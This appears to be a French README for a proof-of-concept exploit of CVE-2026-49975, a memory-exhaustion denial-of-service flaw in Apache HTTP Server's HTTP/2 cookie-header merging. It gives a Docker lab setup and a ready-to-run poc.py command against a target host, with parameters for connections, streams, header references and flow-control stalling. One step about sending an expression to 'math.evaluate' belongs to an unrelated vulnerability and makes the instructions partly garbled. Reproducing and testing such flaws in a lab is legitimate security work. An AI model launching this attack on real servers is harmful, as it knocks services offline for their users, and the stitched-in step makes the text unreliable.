
HTTP2-Bomb
★ CVE-2026-49975 PoC de la Bombe HTTP/2 ★
CVE-2026-49975 est une vulnérabilité Denial of Service (DoS) dans Apache HTTP Server. La vulnérabilité se produit dans le chemin de traitement des requêtes HTTP/2, où plusieurs champs d'en-tête
cookiepeuvent être fusionnés sans être correctement comptabilisés par rapport àLimitRequestFields. En envoyant une petite requête HTTP/2 encodée en HPACK qui se développe en de nombreux champs d'en-têtecookie, un attaquant peut forcer le serveur à allouer de la mémoire de manière répétée lors de la fusion des en-têtes Cookie. L'attaquant peut ensuite utiliser le contrôle de flux HTTP/2 pour retarder la transmission des réponses, maintenant les flux affectés ouverts et empêchant la mémoire allouée d'être libérée.
| Catégorie | Version |
|---|---|
| Vulnérable | Apache HTTP Server 2.4.17 ≤ version ≤ 2.4.67 |
| Corrigée | Apache HTTP Server 2.4.68 ou ultérieure |
Construisez et exécutez l'environnement Apache HTTP Server vulnérable.
docker build -t cve-2026-49975 .
docker run -d --name cve-2026-49975 --memory 8g -p 10081:80 cve-2026-49975
Après avoir démarré l'environnement vulnérable, suivez les étapes ci-dessous pour reproduire l'attaque.
docker stats cve-2026-49975
Exemple de sortie :
CONTAINER ID NAME CPU % MEM USAGE / LIMIT MEM %
xxxxxxxxxxxx cve-2026-49975 0.5% 35.2MiB / 8.0GiB 1.7%
Envoyez l'expression suivante à math.evaluate (par exemple, via l'entrée de calcul de l'application).
python3 poc.py \
--host TARGET_IP \
--port 10081 \
--connections 10 \
--streams 100 \
--refs 4091 \
--initial-window 0 \
--hold 300 \
--drip-interval 2 \
--drip-bytes 1
Vérifiez que l'utilisation de la mémoire du conteneur Apache augmente et reste élevée pendant que les flux d'attaque sont maintenus ouverts.